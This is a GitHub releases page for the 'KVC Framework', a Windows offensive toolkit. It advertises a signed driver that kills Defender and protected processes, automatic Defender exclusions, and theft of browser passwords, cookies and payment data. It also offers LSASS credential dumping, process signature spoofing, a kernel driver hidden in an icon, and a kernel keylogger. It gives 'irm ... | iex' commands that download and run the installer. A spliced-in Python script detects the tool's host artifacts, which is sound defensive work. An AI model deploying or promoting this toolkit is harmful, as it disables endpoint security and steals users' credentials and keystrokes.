Releases: wesmar/kvc
KVC Framework - Release 03.05.2026
🔐 PASSWORD: github.com
Extract downloaded release with password: github.com
📦 ARCHIVE CONTENTS (kvc.7z — 2.5M)
kvc-latest/
│
├── kvc.exe ⭐ Main KVC Framework executable (REQUIRED) [1.3M]
├── kvc.dat ⭐ Encrypted PassExtractor module (OPTIONAL) [740K]
│       Required for: Chrome, Edge, Brave passwords + cookies
├── README.txt 📄 Installation guide
│
└── other-tools/ 🔧 Development & Research Tools (OPTIONAL)
    │
    ├── encoding-tools/ 📦 Framework Build Pipeline
    │   ├── implementer.exe - Steganographic icon builder
    │   ├── KvcXor.exe - Resource encoder/decoder
    │   ├── kvc.ini - Icon builder configuration
    │   ├── kvc.sys - Kernel driver component
    │   ├── kvcstrm.sys - OmniDriver kernel primitive
    │   ├── kvckiller.sys - Digitally signed kill driver (PP/PPL bypass, no HVCI restart)
    │   ├── ExplorerFrame.dll - System DLL (with U+200B hijack char)
    │   ├── kvc_orig.ico - Original icon template
    │   ├── kvc.ico - Built steganographic icon
    │   ├── kvc_pass.exe - Password extractor binary
    │   └── kvc_crypt.dll - Encryption / injection library
    │
    └── keylogger-kit/ ⌨️ Kernel Keylogger Research Tools
        ├── UdpLogger.apk - Android UDP receiver (1.47 MB)
        ├── kvckbd.sys - Keyboard hook driver (14 KB)
        ├── kvckbd.bat - Automated deployment script
        ├── kvckbd_split.c - Driver source code (79 KB)
        ├── OmniDriver.sys - Universal kernel access (13 KB)
        ├── MainActivity.kt - Android app source
        └── UdpLoggerService.kt - Android service source
🔗 DOWNLOAD LINKS
| File | Size | Description |
|---|---|---|
| kvc.7z | 2.5M | Main archive (password: github.com) |
| kvc.enc | 2.0M | Deployment package (used by irm installer) |
| kvcforensic.dat | 644K | Forensic module — LSASS minidump credential extraction (kvc analyze) |
| UnderVolter.dat | 176K | EFI undervolting module (kvc undervolter deploy) |
| run | — | PowerShell one-command installer |
🚀 QUICK INSTALLATION
One-Line Remote Install:
irm https://github.com/wesmar/kvc/releases/download/latest/run | iex
Downloads kvc.exe + kvc.dat, runs kvc setup automatically.
Mirror:
irm https://kvc.pl/run | iex
Manual:
- Download kvc.7z, extract with password github.com
- Open elevated Command Prompt (Run as Administrator)
- Run: kvc setup
✅ WHAT'S NEW — 03.05.2026
- kvckiller.sys — digitally signed kill driver — New kernel driver added to the resource bundle (service: wsftprm, device: .\Warsaw_PM). Carries a valid digital signature — loads without DSE bypass, without HVCI restart, without any unsigned-driver prerequisites. Terminates any process regardless of PP/PPL level via IOCTL 0x22201C. Replaces kvcstrm as the PP/PPL kill primitive.
- secengine disable — no restart, three targets — kvc secengine disable now kills MsMpEng.exe and SecurityHealthSystray.exe via kvckiller IOCTL, stops SecurityHealthService via SCM stop, and sets IFEO Debugger=systray.exe on all three targets. Fully restart-free on every system. --restart flag removed.
- secengine enable — now also explicitly starts SecurityHealthService via SCM in addition to WinDefend.
- kvc kill — kvckiller fallback — kvcstrm replaced by kvckiller as the PP/PPL fallback when kvc.sys primary kill fails. Exe path cached via QueryFullProcessImageNameW at kill time (HKCU\Software\kvc\KilledPaths).
- kvc restore — process relaunch — kvc restore <name> now falls back to relaunching the killed process when no saved PPL state exists: SCM service scan by ImagePath first, then ShellExecuteEx with the path cached at kill time. Example: kvc kill msmpeng then kvc restore msmpeng brings MsMpEng back.
- IFEO hive path fix — hive file now correctly lands at C:\Windows\Temp\Ifeo.hiv (was C:\Windows\TempIfeo.hiv due to missing backslash). CLFS transaction log cleanup extended to cover .TM.blf and .TMContainer*.regtrans-ms files via parent-dir prefix scan.
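The host artifacts named in these notes (the wsftprm driver service, IFEO Debugger values on the three Defender targets, the C:\Windows\Temp\Ifeo.hiv export, and the HKCU\Software\kvc\KilledPaths cache) can be matched in endpoint telemetry. The detection logic below is an added example, not part of the KVC project; the event schema (host/type/target/data) and the sample events are constructed for illustration.

```python
import re

# Indicators taken from the release notes above.
IFEO_TARGETS = ("msmpeng", "securityhealthsystray", "securityhealthservice")
DRIVER_SERVICE = "wsftprm"
KILLED_PATHS_KEY = r"software\kvc\killedpaths"
HIVE_FILE = r"c:\windows\temp\ifeo.hiv"
IFEO_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
# Captures the image subkey (optional .exe dropped) of an IFEO Debugger value.
IFEO_RE = re.compile(
    r"\\image file execution options\\([^\\]+?)(?:\.exe)?\\debugger$", re.IGNORECASE)


def classify(event):
    """Return a finding string for one normalized event, or None if benign."""
    kind, target = event.get("type"), event.get("target", "")
    if kind == "registry_set":
        m = IFEO_RE.search(target)
        if m and m.group(1).lower() in IFEO_TARGETS:
            return f"IFEO Debugger={event.get('data', '?')} set on {m.group(1)}"
        if KILLED_PATHS_KEY in target.lower():
            return "kvc KilledPaths cache written"
    elif kind == "service_install" and target.lower() == DRIVER_SERVICE:
        return f"driver service {DRIVER_SERVICE} installed"
    elif kind == "file_create" and target.lower() == HIVE_FILE:
        return "IFEO hive export written to C:\\Windows\\Temp"
    return None


def scan(events):
    """Return (host, finding) pairs for every event that matches an indicator."""
    return [(e["host"], f) for e in events if (f := classify(e))]


# Constructed sample events (hypothetical schema, not real log output).
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "service_install", "target": "wsftprm"},
    {"host": "ws01", "type": "registry_set", "data": "systray.exe",
     "target": IFEO_KEY + r"\MsMpEng.exe\Debugger"},
    {"host": "ws01", "type": "file_create", "target": r"C:\Windows\Temp\Ifeo.hiv"},
    {"host": "ws01", "type": "registry_set",
     "target": r"HKU\S-1-5-21-0-0-0-1001\Software\kvc\KilledPaths\msmpeng"},
    {"host": "ws02", "type": "registry_set", "data": "vsjitdebugger.exe",
     "target": IFEO_KEY + r"\notepad.exe\Debugger"},
    {"host": "ws02", "type": "service_install", "target": "Spooler"},
]

if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(host, finding)
```

Any single match is weak on its own; several on one host within a short window, as on ws01 in the sample, is the pattern worth alerting on.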
📋 AUTOMATIC SETUP PROCESS (kvc setup)
- Moves kvc.exe to C:\Windows\System32
- Adds Windows Defender exclusions automatically
- Extracts kernel driver from steganographic icon resource
- Deploys PassExtractor if kvc.dat is present:
  - Decrypts and splits kvc.dat → kvc_pass.exe + kvc_crypt.dll
  - Writes both to C:\Windows\System32
- Full browser extraction (Chrome, Edge, Brave) available immediately
🎯 kvc.dat — PassExtractor Module
- Required for: Chrome, Edge, Brave — passwords, cookies, payment data
- Deployment: Automatic via kvc setup or the irm one-liner
- Without kvc.dat: Edge-only DPAPI password fallback (no cookies)
- Browsers: Chrome, Microsoft Edge, Brave Browser
- No browser close required: network-service kill + COM elevation
📞 CONTACT & SUPPORT
- Email: marek@wesolowski.eu.org
- Website: https://kvc.pl
- GitHub: https://github.com/wesmar/kvc
⚖️ LEGAL DISCLAIMER
For educational and authorized security testing purposes only.
Unauthorized access to computer systems is illegal.
The author assumes no liability for misuse.
Release Date: 03.05.2026
© WESMAR 2026
KVC Framework v1.0.1 - Release 04.04.2026
🔐 PASSWORD: github.com
Extract downloaded release with password: github.com
📦 ARCHIVE CONTENTS (kvc.7z — 3.1M)
kvc-v1.0.1/
│
├── kvc.exe ⭐ Main KVC Framework executable (REQUIRED) [1.1M]
├── kvc.dat ⭐ Encrypted PassExtractor module (OPTIONAL) [740K]
│       Required for: Chrome, Edge, Brave — passwords + cookies
├── README.txt 📄 Installation guide
│
└── other-tools/ 🔧 Development & Research Tools (OPTIONAL)
    │
    ├── encoding-tools/ 📦 Framework Build Pipeline
    │   ├── implementer.exe - Steganographic icon builder
    │   ├── KvcXor.exe - Resource encoder/decoder
    │   ├── kvc.ini - Icon builder configuration
    │   ├── kvc.sys - Kernel driver component
    │   ├── ExplorerFrame.dll - System DLL (with U+200B hijack char)
    │   ├── kvc_orig.ico - Original icon template
    │   ├── kvc.ico - Built steganographic icon
    │   ├── kvc_pass.exe - Password extractor binary
    │   └── kvc_crypt.dll - Encryption / injection library
    │
    ├── undervolter/ 🔋 EFI Undervolting Module
    │   ├── UnderVolter.dat - Encrypted EFI payload → deploy with: kvc undervolter deploy
    │   ├── Loader.efi - UEFI loader (replaces BOOTX64.EFI in mode A)
    │   ├── UnderVolter.efi - Main EFI application (voltage/power MSR writes)
    │   └── UnderVolter.ini - Per-CPU profile (Intel 2nd–15th gen, auto-selected by CPUID)
    │
    └── keylogger-kit/ ⌨️ Kernel Keylogger Research Tools
        ├── UdpLogger.apk - Android UDP receiver (1.47 MB)
        ├── kvckbd.sys - Keyboard hook driver (14 KB)
        ├── kvckbd.bat - Automated deployment script
        ├── kvckbd_split.c - Driver source code (79 KB)
        ├── OmniDriver.sys - Universal kernel access (13 KB)
        ├── MainActivity.kt - Android app source
        └── UdpLoggerService.kt - Android service source
🔗 DOWNLOAD LINKS
| File | Size | Description |
|---|---|---|
| kvc.7z | 3.1M | Main archive (password: github.com) |
| kvc.enc | 1.9M | Deployment package (used by irm installer) |
| run | — | PowerShell one-command installer |
🚀 QUICK INSTALLATION
One-Line Remote Install:
irm https://github.com/wesmar/kvc/releases/download/v1.0.1/run | iex
Downloads kvc.exe + kvc.dat, runs kvc setup automatically.
Mirror:
irm https://kvc.pl/run | iex
Manual:
- Download kvc.7z, extract with password github.com
- Open elevated Command Prompt (Run as Administrator)
- Run: kvc setup
✅ WHAT'S NEW — 04.04.2026
- Process Signature Spoofing (Full Camouflage) — Added the ability to spoof cryptographic signature levels (SignatureLevel and SectionSignatureLevel) within the EPROCESS structure. When applying protection via kvc protect or kvc set (e.g., PPL-Antimalware), KVC automatically calculates and applies optimal signature levels (e.g., 0x37 / 0x07). The process becomes indistinguishable from legitimate protected binaries (like MsMpEng.exe) even under deep kernel inspection. Manual control via: kvc spoof <PID|name> <ExeSigHex> <DllSigHex> — allows surgical manipulation of signature bytes to mimic any Windows component (including Kernel/System signatures like 0x1E / 0x1C).
- Browser extraction without closing — Chrome, Edge, and Brave passwords, cookies, and payment data are extracted while the browser is running. The orchestrator kills only the browser's network-service subprocess (which holds database file locks), not the browser itself. For Edge, a second network-service kill is issued right before the DLL opens the database, compensating for Edge restarting its network service faster than Chrome.
- COM Elevation for Edge — Edge master key decryption now uses IEdgeElevatorFinal (CLSID {1FCBE96C-1697-43AF-9140-2897C7C69767}) for all data types including passwords. DPAPI is used as fallback only. Previous split-key strategy (DPAPI for passwords, COM for cookies) removed.
- kvc.dat covers Chrome AND Edge — kvc.dat deploys both kvc_pass.exe and kvc_crypt.dll to System32. Required for full extraction (passwords + cookies + payments) from all Chromium-based browsers.
- Legacy CPU support — no AVX/YMM instructions. Works on 3rd-gen Intel Core and older (SSE2 only). Verified with dumpbin /disasm | findstr ymm.
- Static CRT — kvc_pass.exe and kvc_crypt.dll link C++ runtime statically (/MT). No vcruntime140.dll dependency.
- UnderVolter — EFI undervolting module — kvc undervolter deploy writes a custom UEFI application to the EFI System Partition. On boot it applies Intel voltage/power-limit offsets via MSR writes before the Windows kernel loads. ESP is accessed via GPT partition GUID using FindFirstVolume + IOCTL_DISK_GET_PARTITION_INFO_EX — no drive-letter assignment or mountvol. Supports Intel 2nd–15th gen (Sandy Bridge → Arrow Lake); profile selected automatically by CPUID at boot. Build: KvcXor.exe option 6 packs Loader.efi + UnderVolter.efi + UnderVolter.ini → UnderVolter.dat. Full docs and source: https://kvc.pl/repositories/undervolter
📋 AUTOMATIC SETUP PROCESS (kvc setup)
- Moves kvc.exe to C:\Windows\System32
- Adds Windows Defender exclusions automatically
- Extracts kernel driver from steganographic icon resource
- Deploys PassExtractor if kvc.dat is present:
  - Decrypts and splits kvc.dat → kvc_pass.exe + kvc_crypt.dll
  - Writes both to C:\Windows\System32
- Full browser extraction (Chrome, Edge, Brave) available immediately
Release Date: 04.04.2026